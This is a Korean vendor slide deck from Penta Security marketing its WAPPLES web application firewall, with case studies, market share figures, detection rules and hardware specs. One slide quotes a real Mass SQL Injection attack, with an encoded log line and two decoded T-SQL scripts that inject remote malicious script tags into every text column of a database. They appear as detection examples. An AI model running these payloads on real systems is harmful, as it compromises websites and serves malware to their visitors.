I II III IV 웹방화벽의필요성 WAPPLES 위치 인증및수상현황 2

Similar documents
EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

PowerPoint 프레젠테이션

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

Portal_9iAS.ppt [읽기 전용]

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간 약 4천여 고객 사이트에 구축 운영되면서 기술의 안정성과 성능면에서 철저한 시장 검증을 거쳤습니다. 또한 TrusGuard는 단독 기능 또는 복합 기능 구동 시

<목 차 > 제 1장 일반사항 4 I.사업의 개요 4 1.사업명 4 2.사업의 목적 4 3.입찰 방식 4 4.입찰 참가 자격 4 5.사업 및 계약 기간 5 6.추진 일정 6 7.사업 범위 및 내용 6 II.사업시행 주요 요건 8 1.사업시행 조건 8 2.계약보증 9 3


(Microsoft PowerPoint - NRMWFKPIIYBC [\310\243\310\257 \270\360\265\345])

CSA Summit Korea 2013


EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

OUR INSIGHT. YOUR FUTURE. Disclaimer Presentation ( ),. Presentation,..,,,,, (E).,,., Presentation,., Representative.( ). ( ).

Microsoft Word - Mass SQL Injection_v.1.3._.doc

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷

<49534F C0CEC1F520BBE7C8C4BDC9BBE720C4C1BCB3C6C320B9D D20BDC3BDBAC5DB20B0EDB5B5C8AD20C1A6BEC8BFE4C3BBBCAD2E687770>

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

Cloud Friendly System Architecture

SOLUTION BRIEF 차세대 빅데이터 기반 통합로그관리시스템으자, SIEM 솔루션으로 데이터를 수집/분석/검색 및 추가하고, 효율적인 보안 운영을 실시합니다. 대용량 데이터를 수집하고 처리하는 능력은 사이버 보안에 있어서 통찰력을 제공하는 가장 중요하고, 기초적인

<B1DDC0B6C1A4BAB8C8ADC1D6BFE4B5BFC7E C8A3292E687770>

최종_백서 표지

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

제목 레이아웃

PowerPoint 프레젠테이션

Microsoft PowerPoint - CoolMessenger_제안서_라이트_200508

UDP Flooding Attack 공격과 방어

PCServerMgmt7

Secure Programming Lecture1 : Introduction

5th-KOR-SANGFOR NGAF(CC)

1. 제품 개요 WeGuardia WIPS V2.0(이하 TOE)은 특정 조직에서 운영되는 무선랜에 대한 지속적인 모니터을 통해 내 외부로부터 발생할 수 있는 각종 침입을 탐지 및 차단하여 내부의 네트워크를 보호하는 무선침입방지시스템이다. TOE의 세부 식별자 및 배포

vm-웨어-01장


Model Investor MANDO Portal Site People Customer BIS Supplier C R M PLM ERP MES HRIS S C M KMS Web -Based

슬라이드 1

PowerPoint Template

Intra_DW_Ch4.PDF

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

PowerPoint Presentation

76 XSS 하 Huge-IT Slider admin.php XSS

Web Application Firewall 개요 - 웹보안 Web Application Firewall 국내최고성능웹방화벽으로금융, 포털, 공공, 기업등다양한서비스규모와산업에서웹보안을인정받고있습니다. 웹방화벽은웹서버와웹서비스사용자 사이에서요청검사와응답검사를통해웹서버및

요 약 문 1. 제목 : 개인정보 오남용 유출 2차 피해 최소화 방안 2. 연구의 배경 개인정보란 살아 있는 개인에 관한 정보로서 개인을 알아볼 수 있는 정보로 해당 정보만으로는 특정 개인을 알아볼 수 없더라도 다른 정보와 쉽게 결합하여 알아볼 수 있는 것을 포함한다.

슬라이드 1

6강.hwp

Cisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2

SKINFOSEC_TECH_005_China Bot_가칭_ 악성코드 분석_v0.3.doc

90

1217 WebTrafMon II

PowerPoint 프레젠테이션

*****

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

2007 상반기 실적회의 - DRM Extension

Mstage.PDF

[Brochure] KOR_TunA

PowerPoint 프레젠테이션

제20회_해킹방지워크샵_(이재석)

PowerPoint 프레젠테이션

03여준현과장_삼성SDS.PDF

IPAK 윤리강령 나는 _ 한국IT전문가협회 회원으로서 긍지와 보람을 느끼며 정보시스템 활용하 자. 나는 _동료, 단체 및 국가 나아가 인류사회에 대하여 철저한 책임 의식을 가진 다. 나는 _ 활용자에 대하여 그 편익을 증진시키는데 최선을 다한다. 나는 _ 동료에 대해

ODS-FM1

PowerPoint 프레젠테이션

untitled

Analyst Briefing

Observational Determinism for Concurrent Program Security

PowerPoint 프레젠테이션

Ç¥Áö

개요 - 웹보안 설계부터다른고성능웹방화벽이웹사이트의안전을보장합니다. 국내최고 20Gbps 동시세션, CPS, TPS 등에서도국내최고 신뢰할수있는웹애플리케이션보안 PCI-DSS 최신 3.0 버전준수 결제카드산업데이터표준 국내최고 SSL 처리성능 RSA 2048bit ke

SMB_ICMP_UDP(huichang).PDF

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

1 전통 소프트웨어 가. ERP 시장 ERP 업계, 클라우드 기반 서비스로 새로운 활력 모색 - SAP-LGCNS : SAP HANA 클라우드(SAP HEC)를 통해 국내 사례 확보 및 아태 지역 진 출 추진 - 영림원 : 아시아 클라우드 ERP 시장 공략 추진 - 더

슬라이드 1

특허청구의 범위 청구항 1 회선 아이디 접속 시스템에 있어서, 온라인을 통해 실제 사용자 고유정보의 발급이 가능한 아이디 발급 사이트를 제공하기 위한 아이디 발급 수단; 오프라인을 통한 사용자의 회선 아이디 청약에 따라 가상의 사용자 고유정보 및 가인증 정보를 생성하고

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을


Voice Portal using Oracle 9i AS Wireless

4? [The Fourth Industrial Revolution] IT :,,,. : (AI), ,, 2, 4 3, : 4 3.


untitled

월간 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호

*

슬라이드 1

본 CERT) "Security Consumer Report - DLP" 는 한국침해사고대응팀협의회(CNCERT:CNsortium of 회원으로 활동하는 보안 담당자가 자발적으로 보고서 위원회를 구성한 후 국내에서 유 통되는 DLP 제품을 조사( 기획 수행 제작) 한

ARMBOOT 1

<4D F736F F F696E74202D20C8B8BBE7BCD2B0B3BCAD2D28C1D629C0A7C5B0BDC3C5A5B8AEC6BC2D E >

3장

Microsoft PowerPoint - 3.공영DBM_최동욱_본부장-중소기업의_실용주의_CRM

Windows 8에서 BioStar 1 설치하기

Deok9_Exploit Technique

비식별화 기술 활용 안내서-최종수정.indd

TGDPX white paper

ìœ€íŁ´IP( _0219).xlsx

PowerPoint 프레젠테이션

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일


문서 템플릿

슬라이드 1

untitled

Transcription:

지능형웹어플리케이션방화벽 2013 년 12 월펜타시큐리티시스템

I II III IV 웹방화벽의필요성 WAPPLES 위치 인증및수상현황 2

I 웹방화벽의필요성 Internet 에접속되어있다는것 = 언제든 Hacker 의공격을받을수있다는것 Gartner 보고서에서도언급된바있듯이, Web 공격의 75% 가웹어플리케이션층을타겟으로발생하고있다. 3

I 웹방화벽의필요성 2000 년대이후공격유형변화 è 웹어플리케이션공격 웹을통한비즈니스가증가하면서웹어플리케이션의보급확장 B2B, B2C, G2C 등의다양한사업분야에서내부웹서비스뿐만아니라외부웹서비스를위하여사용하게되면서웹어플리케이션의보급이확장되는추세 웹어플리케이션에대한취약성증가 모든취약점중에 53% 가웹어플리케이션과관련 1 그중 26% 의알려진취약점만이해결됨 (2008 년말기준 ) 2 해커들의 No.1 공격타겟매 4.5 초마다해커들에게공격당한새로운페이지가발견 2 SQL Injection 은가장위협적인해킹기법 3 Others, 30% SQL Injection, 30% 1. IBM Internet Security Systems in 2008 X-Force Trend & Risk Report 2. Sophos, Security threat report: 2009 - Prepare for this year s new threats 3. WASC : The Web Hacking Incidents Database CSRF, 3% Cross Site Scripting (XSS), 8% Unknown, 29% 4

I 웹방화벽의필요성 웹어플리케이션층에대한공격위협증가 점점더많은기업, 기관, 정부및개인이웹을통한서비스확대로다양한웹접속장비가시장으로유입되고있으며, 그로인해웹어플리케이션층에대한공격위협은지속적으로증가하고있다. 2000 Today 5

I 웹방화벽의필요성 BYOD 시대도래로인한내부해킹위험증가 l Mobile Data Protection (MDP) 개인모바일장비해킹을통해가능한웹서버공격유형 Webshell Upload Stealth Commanding 등을통한서버내부데이터조작 개인정보유출 l 외부공격만방어하는방식의한계이미해킹당한개인모바일장비가기업내환경에접속할수있기때문에, 내부를통한웹서버해킹방지필요 WAPPLES 을이용하여내부망관련공격을탐지하고차단 l WAPPLES 을통한 Mobile Data Protection File Upload : Web Shell Upload 방지 Stealth Commanding : 서버내부데이터조작방지 Privacy Output/Input/File Filtering : 개인정보유출방지 6

I 웹방화벽의필요성 최근발생한치명적인사이버공격들모두웹해킹! 머니투데이 이코노믹리뷰 머니투데이 동아일보 7

OWASP TOP 10 SQL Injection Cross Site Scripting Web-based Malware Encrypted Data Access Control Secure Coding Analyzing & Reporting System Malware Signature Matching Ping of Death NetBIOS

II WAPPLES 위치 지능형웹방화벽 WAPPLES 통함데이터암호화솔루션 D Amo 60% 시장점유율로대한민국시장을선도. 2004 년이후 2,000 여대구축하여점유율 1 위 독창적인지능형보안엔진탑재 오탐없이알려지지않은공격까지차단 No.1 데이터암호화솔루션 2004 년이후 1,800 여개의고객사보유 Oracle(Enterprise/Standard), MS SQL, Server, DB2 지원 D Amo SG 와 D Amo SCP 를통해다양한보안환경에적용 강력한보안성 SSO 솔루션 ISign+ 국내최초 SSO 솔루션 2001 년국내최초로발표된기업내부보안을위한 Single Sign On 솔루션 전사적인정보보호인프라로서의 Single Sign-On 과 RBAC(role Based Access Control) 기술을도입한통합권한관리제공 9

II WAPPLES 위치 고객상황 온라인교육사이트를운영하는웹서버가홈페이지해킹후악성코드가대량으로배포되어과도한부하발생 컨텐츠를노린웹공격이중국으로부터수시로발생하여정상적인서비스제공에어려움을겪음 대응 설치구성도 웹방화벽을웹서버앞에인라인방식으로설치 로그분석을통해다양한백도어발견, 제거 백도어제거중공격자가설치한다양한악성코드설치를확인하고이를제거 중국으로부터의 SQL Injection 공격등을웹방화벽을통해차단 웹방화벽운영을통해컨텐츠복사시도차단도입효과 웹방화벽설치전악성코드의대량유포로인해웹서버의부하증가로수시로부팅을했으나웹방화벽운영후부하증가현상이소멸됨 악성코드차단및삭제를통해서비스를위한네트워크대역폭확보 교육사이트의주요자산인컨텐츠복사근절 10

II WAPPLES 위치 고객상황 외부에노출된그룹웨어및내부중요서버에대한보안 개인정보유출및지속적인자동화된공격보호필요 대응 설치구성도 이중화된네트워크지원을위해웹방화벽이중화 Active/Standby 구성및인라인방식구축 업무처리시발생되는웹어플리케이션오류확인 개인정보유출경로파악조치 자동화된공격발생시, 자동으로블랙리스트 IP 관리기능활용, URL 접근제어기능반영 도입효과 개인정보유출 / 웹어플리케이션오류 URL 보호를통한신뢰성제공 자동화된공격차단으로인한, 서비스안전성및가용성증가 보안감사시소스코드수정등에비해 TCO 절감 내부중요서버어플리케이션에대해, 인가된사용자만접근가능함에따라, 내부정보유출방지 11

II WAPPLES 위치 (2013 년 12 월누적기준 ) 구축수 펜타시큐리티 P사 T사 M사기타 - 500 1,000 1,500 2,000 12

II WAPPLES 위치 80% 70% 60% 50% 40% 30% 20% 10% 0% 2008 년 2009 년 2010 년 2011 년 2012 년 펜타시큐리티시스템트리니티소프트파이오링크윈스테크넷이지서티모니터랩 A. 침입방지조달판매량 (2008 년 ~ 2012 년 ) 판매순위 회사명 2008년 2009년 2010년 2011년 2012년 합계 1위 펜타시큐리티시스템 53 EA 93 EA 39 EA 38 EA 64 EA 287 EA 2위 트리니티소프트 32 EA 24 EA 9 EA 12 EA 11 EA 88 EA 3위 파이오링크 23 EA 8 EA 17 EA 14 EA 62 EA 4위 윈스테크넷 ( 나우콤 ) 9 EA 19 EA 12 EA 3 EA 43 EA 5위 이지서티 5 EA 1 EA 6 EA 6위 모니터랩 2 EA 2 EA 13

III A. 웹방화벽침입방지WAPPLES 특징 1 패턴 + 논리로직분석엔진을통한높은보안성 2 27 가지룰정책으로 OWASP 10 대항목외해킹다중탐지 3 동일사검증필암호모듈탑재로업데이트및유사시원활한지원 4 SSL 없이 Client 와웹방화벽구간암호화기능지원 5 통합관리솔루션 (WAPPLES-MS) 및 I.C.S 지원 6 관리편의성 UI 화면분할, Preset 정책, Drag&drop, Dot net 기반 7 다중네트워크지원및다양한구성환경지원 (In-Line, Proxy, One-Armed) 14

III WAPPLES 공격탐지엔진 : 3 가지평가방식을기반으로한 26 개의룰로구성 Heuristic( 학습 ) 분석기반의평가 Semantic( 의미 ) 분석기반의평가 Pattern Matching( 패턴매칭 ) 기반의평가 Heuristic( 학습 ) 분석기반의평가 Semantic( 의미 ) 분석기반의평가 Pattern Matching( 패턴매칭 ) 기반의평가 Cross Site Scripting Buffer Overflow Include Injection Directory Listing Cookie Poisoning Invalid HTTP Error Handling IP Block Invalid URI Extension Filtering Parameter Tampering Parameter Tampering File Upload Suspicious Access Privacy File Filtering Input Content Filtering URI Access Control Privacy Input Filtering IP Filtering Privacy Output Filtering Request Method Filtering Request Header Filtering Response Header Filtering SQL Injection User Defined Pattern Stealth Commanding Web Site Defacement Unicode Directory Traversal 15

III q DB 에악성 Java Script 삽입 Mass SQL Injection Bot q SQL Injection 공격의자동화및혼합 = SQL Injection + Cross Site Scripting q 공격의최종목적은웹서버가아닌사용자브라우저 = 트로이목마또는키로거 (Key logger) 설치 q 다중인코팅 2008-03-29 19:02:41 W3SVC1397586572 211.195.232.19 POST /OOOO/OOOOOO/OOOOOO_OOOOO_view.asp bid=pds_vod&num=51&page=1&od=&ky=&sh=';declare%20@s%20nvarchar(4000);set%20@s=cast(0x440045004300 4C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007600610 NVARCHAR(4000));EXEC(@S);-- 80-60.172.219.4 Mozilla/3.0+(compatible;+Indy+Library) - - 200 0 0 q 16 진수 à string à UTF-8 à ASCII DECLARE @T varchar(255),@c varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+' <script src=http://www.nihaorr1.com/1.js></script>''')fetch NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor 16

III Mass SQL Injection 탐지사례 Declare @T Varchar(255), @C Varchar(255) Declare Table_cursor Cursor For Select A.Name,B.Name From Sysobjects A, Syscolumns B Where A.Id = B.Id And A.Xtype='u' And (B.Xtype=99 or B.Xtype=35 or B.Xtype=231 or B.Xtype=167) Open Table_Cursor Fetch Next from table_cursor into @T, @C while (@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+''<script src=http://3b3.org./c.js></script>''') fetch next from table_cursor into @t, @c end close table_cursor deallocate table_cursor 17

III WAPPLES UI : 다양한정보를시각화 트래픽통계 (3D Line 그래프 ) 탐지로그 공격통계 (Pie Chart) 18

III WAPPLES UI : 설정마법사를통한운용성, 상세로그검색및백업, 복구 19

III A. 웹방화벽침입방지WAPPLES 특장점 1. 패턴방식 + 논리로직분석엔진탑재 등록수가한정되어있는패턴이아닌공격기법분석통한정확한웹공격탐지기능 사례 1 : 중국으로부터의다양한 SQL Injection 공격탐지 사례 2 : 신종 DDoS 공격인 Slowloris 공격및 RUDY(Are You Dead Yet) 공격탐지 사례 3 : 주민등록번호검증메커니즘을통한정확한개인정보유출방지 20

III A. 웹방화벽침입방지WAPPLES 특장점 2. 고객과웹방화벽구간을 SSL 없이암호화 웹서버에많은부하를주는 SSL 의단점을극복한 WAPPLES 만의고유한암호화기능 고객으로부터전송되는 HTML Form 을지정하여해당 Form 을암호화해주는기능 IE. FireFox, Chrome, Safari, Opera 등 Multi-Browser 를지원 21

III A. 웹방화벽침입방지WAPPLES 특장점 3. 통합관리솔루션 WAPPLES-MS 네트워크로연결된여러대의 WAPPLES 을하나의관리콘솔에서통합관리 그룹내보안정책동기화, 계층화된보안관리자지정, 통합된통계보고서생성등 WAPPLES MS 구성도 22

III A. 웹방화벽침입방지WAPPLES 특장점 4. Application Layer(L7 Layer) DDoS 방어 WAPPLES 의 Suspicious Access 룰의사용자설정에서 MayBlock Time 을설정하여 Slowloris, R.U.D.Y 등의 L7 DDoS 공격을차단기능제공 웹 DDoS 공격에대해임계치값을설정할수있음 23

III A. 웹방화벽침입방지WAPPLES 특장점 5. ICS WMP (WAPPLES MANAGEMENT PORTAL) 웹 GUI 기반의 WAPPLES Management Portal 서비스로스마트폰으로모니터링가능 WAPPLES ID 별상태 ( 정상 / 위험 / 장애 / 비활성 ) 및시스템현황모니터링 무응답과같은 WAPPLES 비정상상태시알림기능제공 (SMS, E-Mail) 24

III 구분 WAPPLES-50 WAPPLES-100eco 어플라이언스 1U Rack type 1U Rack type Memory 4 GB 4 GB HDD 160GB 500GB Throughput 최대 100 Mbps 최대 500 Mbps NIC 10/100/1000 x 6 port (Bypass 4port) (1 for management) 8 x 10/100/1000 BaseTX (1 for management) 외장 * 웹서버등록제한 : 4 대 25

III 구분 WAPPLES-500 WAPPLES-1200 어플라이언스 1U Rack type 2U Rack type Memory 8 GB 8 GB HDD 500GB 1TB Throughput 최대 500 Mbps 최대 2 Gbps NIC 10/100/1000 x 4 port (Bypass 2port) 추가구성 : 10/100/1000 x 4 port (Bypass 4port) 혹은 Fiber Gbic x 2 port (Bypass 2port) 2 x 10/100/1000 Base TX 4 x 10/100/1000 Base TX Bypass 추가구성 : 4 x 10/100/1000 BaseTX Bypass 8 x 10/100/1000 BaseTX Bypass 4 x 1000 Base SFP 8 x 1000 Base SFP 2 x 1000 Base Optical Bypass 외장 26

III 구분 WAPPLES-2200 WAPPLES-5000 어플라이언스 2U Rack type 2U Rack type Memory 16 GB 24 GB HDD 1TB 1TB Throughput 최대 4 Gbps 최대 10 Gbps NIC 2 x 10/100/1000 Base TX 4 x 10/100/1000 Base TX Bypass 추가구성 : 4 x 10/100/1000 BaseTX Bypass 8 x 10/100/1000 BaseTX Bypass 8 x 1000 Base SFP 2 x 1000 Base Optical Bypass 2 x 10G Base SFP 2 x 10G Base Optical Bypass 2 x 10/100/1000 BaseTX 8 x 10/100/1000 BaseTX Bypass 4 x 1000 BaseSFP 2 x 1000 Base Optical Bypass 추가구성 : 4 x 1000 Base Optical Bypass 2 x 10G Base Optical Bypass 외장 27

III 구분내용 WAPPLES 비고 전문성안정성신뢰성보안성편의성인증기타 제조사의전문성여부 고객운용수에따른회사및제품의안정성여부 제조사의체계적인기술지원여부 OWASP 10 대및국정원 8 대취약점외에기타해킹유형을탐지및차단 관리자의편의성을고려한 UI 및정책설정여부 보안장비의기준이되는인증여부 기타선정및운용에필요한사항 1997 년설립된웹보안전문회사 2,000 여대로국내 1 위점유율 웹방화벽전담부서운용및유사시지역협력사인원지원 총 27 개의룰 /Function 으로다중탐지 Dot NET 기반의유연한 UI CC 인증 (EAL4), GS 인증, IPv6 Ready Logo Silver Mark, 동일사검증필암호모듈탑재 녹색경영 (Green Biz) 선정기관, Intelligent Customer Service 28

IV 인증및수상현황 인증현황 2003.08: NIGT 의 FIPS 46-3, FIPS 197 인증획득 2007.03: 정보통신기술협회 (TTA) GS(Good Software) 인증 2008.01: 암호모듈 (CIS-CC ) 검증필 2009.12: PCI-DSS 준수인증획득 2010.04: MAPP(Microsoft Active Protections Program) 가입 2010.10: IPv6 Ready Logo Silver Mark 인증획득 2011.08: D Amo 2.3 SAP 인증추가 ( 독일 SAP 社 ) 2011.12: VMWare Solution Provider 자격획득 2012.09: 품질경영시스템인증 (ISO 9001:2008) 획득 2012.09: 환경경영시스템인증 (ISO 14001) 획득 2012.10: D Amo v3.0 GS 인증획득 2012.11: 국제 CC(Common Criteria) EAL4 인증 수상현황 2008.11: 한국지능정보시스템학회인텔리전스대상수상 2009.04: 지식경제부신소프트웨어상품대상수상 2009.11: 신기술실용화촉진대회 국무총리상수상 2010.02: 제 9 회대한민국 SW 기업경쟁력대상 고객만족도부문최우수상 수상 2010.07: 2010 년상반기 IT 혁신제품선정 2011.02: 제 10 회대한민국 SW 기업경쟁력특별상수상 2012.05: 특허스타기업선정 2012.11: 지식정보보안산업유공자지식경제부장관표창수상 2012.11: 2012 벤처활성화유공자중소기업청장표창 29

t h a n k y o u Inc. ( 본사 ) 대신정보통신 ( 주 ) 서울특별시영등포구여의도동 25-11 한진해운빌딩 20층 / 제품사업본부서울시금천구가산동 448번지대륭테크노타운 3차 2층대신정보통신 보안사업본부고재민과장 Mobile. 010-2336-8604 Tel. 02-2125-6641 Fax. 02-786-5281 / www.pentasecurity.com TEL. 02-2107-5051 FAX. 02-2107-5190 H.P. 010-9136-0760 / jjoint2@dsic.co.kr Copyright 2013 Inc. All rights reserved. Ver. 2.10